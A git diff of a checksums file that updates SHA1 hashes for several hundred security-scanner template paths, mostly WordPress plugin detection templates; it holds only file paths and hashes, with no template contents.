templates-checksum.txt | 418 ++++++++++++++++++++--------------------- 1 file changed, 209 insertions(+), 209 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ce0915a4b..d90b366a0e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -240,7 +240,7 @@ dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d30c25c13 -dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471 +dast/vulnerabilities/redirect/open-redirect.yaml:68ac64ef8cf7ae88c1484f5c178057ebdcd8023b dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 @@ -813,12 +813,12 @@ helpers/wordpress/plugins/gutenberg.txt:2aec4d7bf0ab32bb446c2b0aed18357efa20cd9f helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d -helpers/wordpress/plugins/header-footer-elementor.txt:e1e19bc7267dd9c0a93903ac4803a7f52de3d1d6 +helpers/wordpress/plugins/header-footer-elementor.txt:7a2aa38dbae06f99122c345cced2a9e98d1c22bb helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf -helpers/wordpress/plugins/hostinger.txt:2eb538e42b910c397ab801353b059c51f265f092 +helpers/wordpress/plugins/hostinger.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/image-optimization.txt:a9ec402f06cdb367cb4ecd9d221265dbc42431cf helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 @@ -891,7 +891,7 @@ helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a helpers/wordpress/plugins/so-widgets-bundle.txt:6d445f8f926ce0b81a2d46eb8ce60af388326266 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 -helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 +helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166bfaf866032133ae1ec337f07572 helpers/wordpress/plugins/sucuri-scanner.txt:381bb12da04a82580bb6d698b8798743668826bd helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 @@ -917,13 +917,13 @@ helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a3 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:f3323ea51e133c445b5c74b7fce4def22ad0f7bb +helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964962f1e869d501afa4 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e -helpers/wordpress/plugins/woocommerce.txt:24449bd7ae23ee836905591888e76ffedd70554d +helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 @@ -5019,7 +5019,7 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/ds-store-file.yaml:71084670f41119f2b073dd935fc2e2542a7f44d8 +http/exposures/files/ds-store-file.yaml:0695229ae660cfc1cddec38c9dda770066acd705 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 http/exposures/files/exposed-alps-spring.yaml:0bc7763901ec79b827388db7d80f1c2838d73f1e @@ -7279,228 +7279,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:c4b819dbefb5586f0ed05d801a6d07678d1eaade -http/technologies/wordpress/plugins/add-to-any.yaml:855bec1195e90142a245a9c9bbff6748163e57da -http/technologies/wordpress/plugins/admin-menu-editor.yaml:f6a94d48c1c91a3e12d8db1f2485d9d691084574 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:7dc2ad428f0c013f415d8d41fffa98446e33d3b4 -http/technologies/wordpress/plugins/akismet.yaml:8b27c116ecbb88cb4b2fd821a3b6f9577a01b37b +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:80e66b11e2b2ea95532ac83515ac7ebaa70051f9 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:a7c60454687b207601e5e99002394b5d9dce2ffd -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:34ed501d349e0fe4d40406a166838dcccf73c096 -http/technologies/wordpress/plugins/amp.yaml:f1af46d0222b39299446a3aebd256aba42355876 -http/technologies/wordpress/plugins/antispam-bee.yaml:d9490d12fe724a64298b1f2adc317088a8bf7089 -http/technologies/wordpress/plugins/astra-sites.yaml:24e48ac0089060d2ea45b83d0f2821cae19a3830 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:cffd928fa5c413343b8e7852daaad72577a11c24 -http/technologies/wordpress/plugins/backwpup.yaml:4558cea5dd4813a223490d7958d08a9bd2683fea -http/technologies/wordpress/plugins/better-search-replace.yaml:f378dac561798a50b5a22716d128c3a2f6ffdad6 -http/technologies/wordpress/plugins/better-wp-security.yaml:54cc959306441a84ab4abcadfc9311d3918c50e8 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:7364fd6242c1399650e2eb72c9c1ecc20f3c8845 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7abb54bf678a29740f0d23a2c4f2abdb89cdadd4 -http/technologies/wordpress/plugins/breeze.yaml:531a349fea2ebe8d18be34c15b0b0d13078b5bce -http/technologies/wordpress/plugins/broken-link-checker.yaml:4c417a7b9fe8114978f5096c400f08e84c632564 -http/technologies/wordpress/plugins/chaty.yaml:ad21778cb3f1eba136e9f09d150a4311411cec70 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:af8adec495191056755fefeb4076a9f34af0496c -http/technologies/wordpress/plugins/classic-editor.yaml:e3b20cfbfe6626ce5eb1c532d303f8393b97ec10 -http/technologies/wordpress/plugins/classic-widgets.yaml:08b202f61784098e82a67a1f2ce5e86162f8e50b -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:725b52daa788cd7169d1d86ade814fb2e4247245 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:bd7a7b62ccb9250ab144cc773a3b4ac0bd781d9e -http/technologies/wordpress/plugins/coblocks.yaml:d9cb686f1ffa042d187921ff9e92a80394e7c7fc -http/technologies/wordpress/plugins/code-snippets.yaml:2813a7430713f50396d5bba0e4d90b9b0b3676b5 -http/technologies/wordpress/plugins/coming-soon.yaml:6e641eed9c1fb7ff822bcb2438e91af7419c87dd -http/technologies/wordpress/plugins/complianz-gdpr.yaml:384285495e27f8c12a6f28b870d831072bd90b00 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:8ab9b1379c6c82fc00ff38946296580c2bdfe2c3 -http/technologies/wordpress/plugins/contact-form-7.yaml:9107d645b06cc5f93abd6243ccddfd5f9af73512 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:254ff3254369fc94b6ab3292f98e9a3e2bf85214 -http/technologies/wordpress/plugins/cookie-law-info.yaml:4bc793afdc54e399280dca0348443c55e9733fc6 -http/technologies/wordpress/plugins/cookie-notice.yaml:4e8ead04526101201070f2e0f1b0535ad389fc0d -http/technologies/wordpress/plugins/copy-delete-posts.yaml:7146f13672a7b77c16b11d5849210a992fb794b5 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:554b666e228811e2284ba6146d5bf7b7c27712b9 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:3837e092cb972185682f06b02c21e8afe12a3043 -http/technologies/wordpress/plugins/custom-css-js.yaml:d7e7484b96aaff7afc089b27520415c80145739c -http/technologies/wordpress/plugins/custom-fonts.yaml:0def07275e086f6676752c7cb6db6915dd3639c2 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:2777c4abadd8a6ffb9a105237cd3a4327d3b5d3a -http/technologies/wordpress/plugins/disable-comments.yaml:9289675a2a6a90db3dce3e9365f8ba1ebb59f991 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:e34c67f65c35f5e3090702ba8bd0c495b4fc592e -http/technologies/wordpress/plugins/duplicate-page.yaml:539e8217686ad56b27fa3c826c19565617100c4a -http/technologies/wordpress/plugins/duplicate-post.yaml:a3b7d49fd8eb5ce9ea43e443cf0d46e78e7f0bd6 -http/technologies/wordpress/plugins/duplicator.yaml:c589b42fa9890b6b93565730e00a6957f5b449b2 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:badde61851f4da669ccb14379d13bccdb1161a41 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:cad41c548e520efdd11b8b03e8152f36289026b1 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2888678d2a93f2fb600abed38f8d4f5404e8d99c -http/technologies/wordpress/plugins/elementor.yaml:3dc812c1fd9f5a30a9c98b4394ede3f5a99cfdb5 -http/technologies/wordpress/plugins/elementskit-lite.yaml:740f453e8056d765f08c43d09963f3159248cf14 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ccad70d77f0b019137f55e4fbc7cafc8a6af95fb -http/technologies/wordpress/plugins/envato-elements.yaml:469db12c875b549236a253fc9ce3b5bafa78a6b4 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:2d2850b8e7db535e47d2f5e7c6b1f40e3c655e1f -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:d6a3640a8350bf89bfdc001e29b3e3b4639cafdd -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:891e19e5537bb065bcb667a9ed07a5c0a030667a -http/technologies/wordpress/plugins/fast-indexing-api.yaml:2def289e563e6c1d7e92f66bd6d9d6d06b4b1607 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c0160531b98315978310af372dc2ae3167d6072c -http/technologies/wordpress/plugins/flamingo.yaml:709ad4dd4502d1e353618567556c502733c2727b -http/technologies/wordpress/plugins/fluentform.yaml:a14a413b80889f4b8de1f00cd5f8e3f86c13669b -http/technologies/wordpress/plugins/font-awesome.yaml:6caac0525abb6e3f0d2d1f0a192acfa9ecc1663e -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:e3d4b9cce6b765b4dcb24f41bb6ac2663c2ba2f0 -http/technologies/wordpress/plugins/formidable.yaml:31cd95d67051cffc07f449980f46536f676180a4 -http/technologies/wordpress/plugins/forminator.yaml:78d31027d26d9ed5b278d4beb30526fe2055925a -http/technologies/wordpress/plugins/ga-google-analytics.yaml:d99cbb0ebd85ee94ea571ae5f31c2bdba565ddf8 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:13ebc602ec7e0fcfbe772ae60ee64204e19f268e -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:eb1d0c708a1e1a73f80b0d04d3be819d70c5cc61 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2ca46b3b1db029b1309c9500bd98071b44a30622 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:448328fcc3c0195ed7404f53a6e12450b1751312 -http/technologies/wordpress/plugins/google-site-kit.yaml:65d4543fe8dee65a6f7139c176ace9f4ff37d328 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:0a3b768e451fb882b314e8a8925f427badaf3b43 -http/technologies/wordpress/plugins/gtranslate.yaml:82d5f2d747ba182355f68b20548ef7baef9c9b90 -http/technologies/wordpress/plugins/gutenberg.yaml:acc2b9a3bca1e0eef88451db97c142f19a14267b -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:d9bce8b47467a1d4818f4004b42358f0a036ff22 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:560b8dee92f33dd9ddbd602395e47e1a9133ea09 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:552f9973acca95a7413b72577eca60815cf3996b -http/technologies/wordpress/plugins/header-footer.yaml:b5c862e3f9a2e423848e74a76eabab98b04802ad -http/technologies/wordpress/plugins/health-check.yaml:9bd7b47723b27f1348cefd4c2c49473663bc7f8f -http/technologies/wordpress/plugins/hello-dolly.yaml:4f562f1b5b1beea9cf1f3231ff2f2687e7b15ab9 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:4373d8b2fe855ea2bf00a11d178ab12dff023e4c -http/technologies/wordpress/plugins/hostinger.yaml:43b7eda62b37e2842c400d0f05e84583c8f0a8a7 -http/technologies/wordpress/plugins/image-optimization.yaml:16ffff4b01dfdf9177437f1026578eb1a3753194 -http/technologies/wordpress/plugins/imagify.yaml:220ef4f8c51b134e48e777ee34012df62f442d71 -http/technologies/wordpress/plugins/imsanity.yaml:352c84873be5c8abf9cc05746a6f8b9a8acf6c60 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:b897aed164fa63760627ff22947f1bf87d1335d1 -http/technologies/wordpress/plugins/instagram-feed.yaml:6424e9a7c1bc13ea05d38aedc1a7de5c530191ca -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8049d00b378d8fd90445efd9cf1fe58cca873ee1 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:2ed212893780a5519ff3ac90d7cf8013f295a2d5 -http/technologies/wordpress/plugins/jetpack.yaml:00681654a86ee1267ee222d752d0986880194394 -http/technologies/wordpress/plugins/kadence-blocks.yaml:d12b70f2bdf67febec22b8f7e269804a23f24b51 -http/technologies/wordpress/plugins/kirki.yaml:caa84a56dca2b5cde08b5f955088a07d6ab592a7 -http/technologies/wordpress/plugins/leadin.yaml:52ea9b1686c97f40b88316d0f931423a4e6f9a6d -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:b4883529a08ce41559f2001d69b0d58fceac85ca -http/technologies/wordpress/plugins/limit-login-attempts.yaml:16616befa4e7566c93a00606167a320d2831eb47 -http/technologies/wordpress/plugins/litespeed-cache.yaml:e476aa31c0387d3a0b5c0dfa6fbae87498f9c959 -http/technologies/wordpress/plugins/loco-translate.yaml:c5dec33ebec859e172da5b30ac90162910f34d70 -http/technologies/wordpress/plugins/loginizer.yaml:85470fbfbffbb1f415f331de15c5aeeba75786ef +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:c31cf9157db77d575d04c76c6d240244267f746c -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:ef732b7c251a508f2d14485470fa2ef6f9711c33 -http/technologies/wordpress/plugins/mailpoet.yaml:9124de5769e58d1587b60db6d311052635f46d2a -http/technologies/wordpress/plugins/maintenance.yaml:ea4b0be1d5af648aba32155290db80333b95df44 -http/technologies/wordpress/plugins/mainwp-child.yaml:7af6d1b35f20237e8bce29faacdc8d689005a24f -http/technologies/wordpress/plugins/malcare-security.yaml:d98e0b2b488b3637d3901343b03e8031ce0367f4 -http/technologies/wordpress/plugins/megamenu.yaml:ec03087b05440a6c065cb0fa3cf79b3fa9ae667f -http/technologies/wordpress/plugins/members.yaml:d7c26bf6edc1fe6a4962973abd9ffe02f5a432ee -http/technologies/wordpress/plugins/meta-box.yaml:654845ea8bad5cd12d6c748b35b97b1516163fab -http/technologies/wordpress/plugins/metform.yaml:bca1b792dbac6e7209bbfcfea11a9f75648be7b9 